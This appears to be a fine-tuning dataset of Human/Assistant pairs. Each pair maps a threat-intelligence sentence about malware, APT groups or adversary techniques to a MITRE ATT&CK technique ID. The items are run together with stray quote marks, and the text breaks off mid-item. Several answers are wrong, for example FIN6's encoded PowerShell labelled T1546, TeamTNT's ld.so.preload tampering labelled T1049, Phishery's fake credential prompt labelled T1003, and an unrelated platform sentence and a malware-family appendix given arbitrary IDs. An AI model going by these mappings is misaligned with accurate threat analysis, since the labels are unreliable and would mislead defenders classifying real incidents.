Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use this technique in conjunction with administrator-level Valid Accounts to remotely access a networked system over SMB, to interact with systems using remote procedure calls , transfer files, and run transferred binaries through remote Execution.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard has searched for private keys in .ssh.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has retrieved a list of trusted domains by using Nltest.exe /domain_trusts.### Assistant: T1482: Domain Trust Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT has the ability to list files upon receiving the ls command from C2.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Penquin can use the command code do_vslist to send file names, size, and status to C2.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search in private threat intelligence vendor data to gather actionable information.### Assistant: T1597: Search Closed Sources" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DLL injection is a method of executing arbitrary code in the address space of a separate live process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This “downloaded” file is actually not dropped onto the system.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has bypassed UAC.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed has the ability to rename its payload to ESTCommon.dll to masquerade as a DLL belonging to ESTsecurity.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may occur through compromising the SSH agent itself or by having access to the agent's socket.### Assistant: T1563: Remote Service Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike uses a custom command and control protocol that can encapsulated in DNS.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These platforms may not be well maintained and may break intermittently### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group's backdoor malware has also been written to a batch file.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stealth Falcon malware gathers passwords from the Windows Credential Vault.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NBT-NS identifies systems on a local network by their NetBIOS name.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The majority of native system logging is stored under the /var/log/ directory.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EvilBunny has an integrated scripting engine to download and execute Lua scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Periodic low resolution screenshots### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stealth Falcon malware gathers passwords from multiple sources, including Windows Credential Vault and Outlook.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 actors use at to schedule tasks to run self-extracting RAR archives, which install HTTPBrowser or PlugX on other victims on a network.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TinyZBot contains functionality to collect information from the clipboard.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 6: Difference between a stock UPX packed file and the modified one A patch for UPX is available on ESET’s malware-research Github repository that allows unpacking Keydnap’s backdoor with the usual upx -d### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerDuke has a command to get text of the current foreground window.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework., Get-MsolRoleMember### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cardinal RAT establishes Persistence by setting the HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load Registry key to point to its executable.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has exfiltrated collected data over a simple HTTPS request to a password-protected archive staged on a victim's OWA servers.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 used PowerShell to execute an encoded command### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can use rundll32.exe to load DLL from the command line.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InnaputRAT uses an 8-byte XOR key to obfuscate API names and other strings contained in the payload.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attached to this email was a malicious Microsoft Word document (MD5: f6fafb7c30b1114befc93f39d0698560) that exploited CVE-2012-0158### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use information acquired via Vulnerabilities to focus exploit development efforts.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avaddon has searched for specific files prior to encryption.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has exploited Microsoft Office vulnerabilities CVE-2014-4114, CVE-2018-0802, and CVE-2018-0798 for execution.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has removed system logs from /var/log/syslog.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bankshot encodes commands from the control server using a range of characters and gzip.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KillDisk registers as a service under the Plug-And-Play Support name.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SOUNDBITE is capable of gathering system information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The file, named Microsoft.Win32.TaskScheduler.dll, is digitally signed by a certificate from AirVPN### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT has a module that steals passwords saved in victim web browsers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Industroyer attempts to perform an HTTP CONNECT via an internal proxy to establish a tunnel.### Assistant: T1572: Protocol Tunneling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By default, Excel does not allow the download of data from the remote server, but will ask for the user’s consent by presenting the dialog box in Figure 2: Figure 2 Excel security notice for .iqy files By enabling this data connection, the user allows Excel to obtain content from the URL in the .iqy file### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Raindrop decrypted its Cobalt Strike payload using an AES-256 encryption algorithm in CBC mode with a unique key per sample.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Backdoor analysis The main loop of the backdoor has two main functions, infoClient and runHandle### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The attackers typically distribute Netwalker ransomware with the use of a reflective PowerShell loader script that has been protected from casual analysis with several layers of obfuscation.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLEAD has the ability to list drives and files on the compromised host.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cadelspy has the ability to log keystrokes on the compromised host.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Azorult can steal credentials in files belonging to common software such as Skype, Telegram, and Steam.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NOKKI can collect the username from the victim’s machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EKANS removes backups of Volume Shadow Copies to disable any restoration capabilities.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,S-Type also runs tests to determine the privilege level of the compromised user.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SOUNDBITE is capable of enumerating application windows.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BOOSTWRITE has encoded its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit Initialization vector to evade detection.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has attempted to use WMI event subscriptions to establish persistence on compromised hosts.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has used scripts to access credential information from the KeePass database.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Appendix Malware Family Descriptions Malware Family Description Availability DROPSHOT Dropper that has been observed dropping and launching the TURNEDUP backdoor, as well as the SHAPESHIFT wiper malware Non-Public NANOCORE Publicly available remote access Trojan (RAT) available for purchase### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,iKitten prompts the user for their credentials.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has also used PowerSploit's Invoke-ReflectivePEInjection.ps1 to reflectively load a PowerShell payload into a random process on the victim system.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE can use Native API including CreateProcess GetProcessById, and WriteProcessMemory.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JSS Loader has the ability to download and execute PowerShell scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpeakUp uses POST and GET requests over HTTP to communicate with its main C&C server.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaes has added persistence via the Registry key software\microsoft\windows\currentversion\run\microsoft windows html help.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shamoon can also spread via PsExec.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also compromise sites then include malicious content designed to collect website authentication cookies from visitors.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 6 Authentication dialog box with fake credentials entered On the C2 server, we observed Phishery receiving the inbound request and capturing the credentials, as seen in Figure 7### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS can use DDE to execute additional payloads on compromised hosts.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.### Assistant: T1526: Cloud Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group often uses the trial version of Cobalt Strike, a publicly available commercial software for “Adversary Simulations and Red Team Operations.” Other public tools used by the group are Metasploit, a well-known free and open source framework for developing and executing exploit code against a remote target machine; Mimikatz, a post-exploitation tool that performs credential dumping; and Empire, “a PowerShell and Python post-exploitation agent.” For detection and exploitation of internet-facing web servers, CopyKittens use Havij, Acunetix and sqlmap### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nebulae uses functions named StartUserModeBrowserInjection and StopUserModeBrowserInjection indicating that it's trying to imitate chrome_frame_helper.dll.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The CAB file contains the following files and functions: dll: A malicious DLL used to launch batch files (used with cliconfg.exe for UAC bypass)### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may register malicious password filter dynamic link libraries into the authentication process to acquire user credentials as they are validated.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,USBferry can use net view to gather information about remote systems.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The malware’s capabilities include taking a system survey, access to the filesystem, executing commands and a reverse shell### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WindTail has the ability to enumerate the users home directory and the path to its own application bundle.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound has used the command-line interface.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify code signing policies to enable execution of unsigned or self-signed code.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DDE is a client-server protocol for one-time and/or continuous inter-process communication between applications.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One archive sample analyzed by CTU researchers contained a legitimate PDF file, a benign image of interest to targets (see Figure 8), and an HttpBrowser installer disguised as an image file### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Inception has used specific malware modules to gather domain membership.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIVEHANDS has the ability to decrypt its payload prior to execution.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has used junk code within their DLL files to hinder analysis.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DustySky achieves persistence by creating a Registry entry in HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ngrok can tunnel RDP and other services securely over internet connections.### Assistant: T1572: Protocol Tunneling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,T9000 searches through connected drives for removable storage devices.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ptrace system call injection involves attaching to and modifying a running process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Downgrading of a system image can be done on its own, or it can be used in conjunction with Patch System Image.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dyre injects into other processes to load modules.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLAINTEE gains persistence by adding the Registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Egregor has used rundll32 during execution.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This simply acts as cleanup to ensure original file artifacts no longer reside on the infected machine### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Get2 has the ability to inject DLLs into processes.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious Document Decoy Document The attack starts with a spear-phishing email containing the HWP document named ""미북 정상회담 전망 및 대비.hwp"" (Prospects for US-North Korea Summit .hwp)### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Most libraries include functionality to encrypt and/or compress data.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32's backdoor has used Windows services as a way to execute its malicious payload.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may create email accounts that can be used during targeting.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like CreateProcess, LoadLibrary, etc.### Assistant: T1129: Shared Modules" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoomBox can check its current working directory and for the presence of a specific file and terminate if specific values are not found.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also install user level timers to achieve user level persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The adversaries modify publicly available tools such as ASPXSpy to remove identifying characteristics that network defenders use to identify web shells### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 has used fragmented strings, environment variables, standard input , and native character-replacement functionalities to obfuscate commands.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additional tools were recovered during the incident, including a network scanning/enumeration tool, the archiving tool WinRAR and a bespoke Microsoft SharePoint enumeration and data dumping tool, known as 'spwebmember'### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Inception has used HTTP, HTTPS, and WebDav in network communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This technique differs from Screen Capture due to use of specific devices or applications for video recording rather than capturing the victim's screen.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has used a utility called CLOSESHAVE that can securely delete a file from the system.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has also used libprocesshider to modify /etc/ld.so.preload.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The use of a shared folder specified in the configuration enables Ragnar Locker to encrypt files on the host operating system, including files on any mapped drives.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HTTPBrowser is capable of capturing keystrokes on victims.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used malware that checked if the ProgramData folder had folders or files with the keywords ""Kasper,"" ""Panda,"" or ""ESET.""### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Opening document starts a template injection technique for loading the document template from the internet.### Assistant: T1221: Template Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This differs from Steal Web Session Cookie and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users.### Assistant: T1606: Forge Web Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CrossRAT can list all files on a system.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerDuke uses rundll32.exe to load.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has used Web shells to maintain access to victim websites.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Skeleton Key is used to patch an enterprise domain controller authentication process with a backdoor password.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KGH_SPY has been spread through Word documents containing malicious macros.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There was a slight deviation in the November grouping, where the three samples we collected still used the Joohn author name for the last modified field but reverted to a default USER/user author name for the creator field### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windshift has used WMI to collect information about target machines.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson contains a command to collect the victim MAC address and LAN IP.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Caterpillar WebShell has a module to perform brute force attacks on a system.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has copied itself to and infected removable drives for propagation.### Assistant: T1091: Replication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST used the WMI query Select * From Win32_SystemDriver to retrieve a driver listing.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The actor has the following demonstrated capabilities:To include exploits (for Hangul and Microsoft Office) in its workflows.To modify its campaigns by splitting the payload in to multiple stages To use compromised web servers or legitimate cloud based platforms### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Industroyer collects the victim machine’s Windows GUID.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ebury can hook logging functions so that nothing from the backdoor gets sent to the logging facility.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NanHaiShu encodes files in Base64.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLINDINGCAN has encrypted its C2 traffic with RC4.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There have been examples of malware targeting session cookies to bypass multi-factor authentication systems.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KEYMARBLE can capture screenshots of the victim’s machine.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hydraq connects to a predefined domain on port 443 to exfil gathered information.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remexi has a command to capture active windows on the machine and retrieve window titles.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Doing so allows a plausible reason for asking about services, policies, and information about their environment.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ragnar Locker may attempt to connect to removable drives and mapped network drives.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JPIN's installer/uninstaller component deletes itself if it encounters a version of Windows earlier than Windows XP or identifies security-related processes running.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SLOWDRIFT downloads additional payloads.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BISCUIT has a command to download a file from the C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LightNeuron can store email data in files and directories specified in its configuration, such as C:\Windows\ServiceProfiles\NetworkService\appdata\Local\Temp\.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Skidmap has the ability to download, unpack, and decrypt tar.gz files .### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 has gathered hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems.### Assistant: T1187: Forced Authentication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerShower has the ability to deploy a reconnaissance module to retrieve a list of the active processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tor plugin ### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MacSpy uses HTTP for command and control.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Xbash can use scripts to invoke PowerShell to download a malicious PE executable or PE DLL for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mosquito executes cmd.exe and uses a pipe to read the results and send back the output to the C2 server.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM has named the scheduled task it creates ""Windows Update"".### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,yty gathers information on victim’s drives and has a plugin for document listing.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some Sakula samples use cmd.exe to delete temporary files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER downloads encoded payloads and decodes them on the victim.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ROKRAT lists the current running processes on the system.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BUBBLEWRAP collects system information, including the operating system version and hostname.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla can gather credentials from a number of browsers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ObliqueRAT can check for blocklisted process names on a compromised host.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If KillDisk gets the access token, then it attempt to modify the token privileges with AdjustTokenPrivileges.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bundlore can persist via a LaunchAgent.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound has attempted to get users to execute malware via social media and spearphishing emails.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Daserf uses encrypted Windows APIs and also encrypts data using the alternative base64+RC4 